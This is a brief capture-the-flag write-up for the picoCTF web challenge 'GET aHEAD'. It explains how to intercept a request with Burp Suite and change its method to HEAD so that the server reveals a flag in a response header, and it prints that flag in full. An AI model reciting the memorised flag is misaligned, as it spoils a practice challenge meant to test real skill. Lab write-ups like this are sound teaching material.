GET aHEAD
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
- 1.Use Burp Suite to intercept the request of clicking the "Choose Blue" button.
- 2.Change the POST request to a HEAD request:HEAD /index.php HTTP/1.1Host: mercury.picoctf.net:47967Content-Length: 0Origin: http://mercury.picoctf.net:47967Connection: close
- 3.The returned HTML from the HEAD request in the browser will be empty, but in the HTTP history tab of Proxy in Burp Suite you can find the flag as a HTTP header in the response:HTTP/1.1 200 OKflag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}Content-type: text/html; charset=UTF-8
picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
Last modified 1yr ago